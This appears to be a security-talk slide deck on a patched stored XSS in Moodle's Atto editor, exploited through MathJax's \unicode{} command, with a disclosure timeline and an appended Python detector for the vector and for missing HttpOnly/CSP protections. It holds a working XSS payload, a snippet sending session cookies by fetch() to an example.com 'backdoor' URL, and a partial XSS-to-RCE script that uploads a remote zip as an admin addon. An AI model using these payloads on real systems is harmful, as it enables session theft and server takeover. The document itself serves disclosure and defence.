# Moodle Stored XSS (2020-05-28)

Sean for SQLab

---

## New E3 is Moodle-based

![](https://i.imgur.com/Oxl5JkH.png)

----

## Atto HTML Editor in Moodle

- Supports limited HTML tags/attrs & LaTeX

![](https://i.imgur.com/MvS3wC0.png)

----

## HTML in Atto Editor

- Only whitelisted tags allowed (e.g. `<code>`, `<img>`, `<p>`, etc.)
- Only whitelisted attributes allowed (e.g. `style`, `src`, etc.)
- Classical XSS methods such as `<svg onload="...">` do not work.

----

## Atto has LaTeX Support!

![](https://i.imgur.com/GZYDQP4.png)

---

## MathJax

A JavaScript display engine for math.

e.g. `$$ \LaTeX $$`

$$ \LaTeX $$

----

## MathJax

`$$ \unicode{ <img src="x" onerror="alert('XSS')"> } $$`

![](https://i.imgur.com/48ygQIh.png)

---

## XSS Exploits

----

## Cookie is not HttpOnly

```javascript
> console.log(document.cookie);
"MoodleSession=qkfif2nbel9pp2th2egorjclh4; \
AMCVS_8E929CC25A1FB2B30A495C97%40AdobeOrg=1; \
PHPSESSID=lp0sfm5hobpaj1uhcg1uv4gfj7"
```

![](https://i.imgur.com/kUsK6ZH.png)

----

## No CSP Headers

```http
HTTP/1.1 200 OK
Content-Security-Policy: connect-src <source>;
```

We can simply use `fetch()` to retrieve secrets in most users' browsers.

```javascript
var c = document.cookie;
var url = `https://example.com/backdoor?cookie=${btoa(c)}`;
fetch(url);
```

---

## RCE using XSS

```javascript
const URL = 'https://e3new.nctu.edu.tw/';

fetch(URL + 'admin/tool/installaddon/index.php', {
  credentials: 'include',
})
  .then(res => res.text())
  .then(data => {
    // parse data and get necessary parameters
    let sesskey = ...
    let clientid = ...

    const rce_file = 'https://example.com/rce.zip';
    fetch(rce_file)
      .then(res => res.blob())
      .then(blob => {
        // upload blob as addon file
      });
  });
```

###### Modified from: [rce_moodle.js](http://sandbox.ahussam.me/rce_moodle.js)

---

## Timeline

| Date | Link |
| --- | --- |
| 2020-05-06 | [Patched](http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-68430) |
| 2020-05-18 | [Security Announcement](https://moodle.org/mod/forum/discuss.php?d=403512) |
| 2020-05-26 | [Blog Published](https://github.com/ahussam/Moodle-xss-to-rce-exploit) |
| 2020-05-28 | Today (Fixed) |

----

## Fixed in New E3

![](https://i.imgur.com/V3prTBq.png)

----

## References

- [Moodle DOM Stored XSS to RCE](https://cube01.io/blog/Moodle-DOM-Stored-XSS-to-RCE.html)
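
----

## Added Example: Checking for the Vector and the Missing Headers

Added example for the MathJax `\unicode{}` slide and the cookie/CSP slides above; this is not code from the deck or from Moodle. It scans stored content for a `\unicode{}` argument that opens an HTML tag inside MathJax delimiters, and audits a response's headers for a `MoodleSession` cookie without `HttpOnly` and for the absence of any `Content-Security-Policy`. The header list format and both samples are constructed assumptions.

```python
import re

# Math spans as Moodle's MathJax filter delimits them: $$...$$, \(...\), \[...\]
MATH_SPAN_RE = re.compile(r"\$\$(.*?)\$\$|\\\((.*?)\\\)|\\\[(.*?)\\\]", re.DOTALL)
# A \unicode{...} argument (optional [..] size arg allowed) whose body opens an HTML tag
UNICODE_TAG_RE = re.compile(r"\\unicode\s*(?:\[[^\]]*\])?\s*\{[^}]*<\s*[A-Za-z!/]", re.DOTALL)


def find_unicode_html_in_math(text):
    """Return every math span whose \\unicode{} argument opens an HTML tag.

    A legitimate \\unicode{x263A} is not reported; \\unicode{ <img ...> } is.
    """
    hits = []
    for m in MATH_SPAN_RE.finditer(text):
        body = next(g for g in m.groups() if g is not None)
        if UNICODE_TAG_RE.search(body):
            hits.append(m.group(0))
    return hits


def audit_response_headers(headers):
    """Flag the two response weaknesses the deck relies on.

    `headers` is a list of (name, value) pairs. A MoodleSession cookie without
    HttpOnly is readable by injected script; with no Content-Security-Policy
    at all, nothing limits where fetch() may send it.
    """
    findings = []
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        if cookie_name == "MoodleSession" and "httponly" not in value.lower():
            findings.append("MoodleSession cookie lacks HttpOnly")
    if not any(n.lower() == "content-security-policy" for n, _ in headers):
        findings.append("no Content-Security-Policy header")
    return findings


# Constructed samples: neither real course content nor a real server response.
SAMPLE_POST = (
    "Smiley: $$ \\unicode{x263A} $$ and then "
    "$$ \\unicode{ <img src=\"x\" onerror=\"alert('XSS')\"> } $$"
)
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "MoodleSession=abc123; path=/; secure"),
]
```

Running `find_unicode_html_in_math(SAMPLE_POST)` reports only the second span, and `audit_response_headers(SAMPLE_HEADERS)` reports both missing protections.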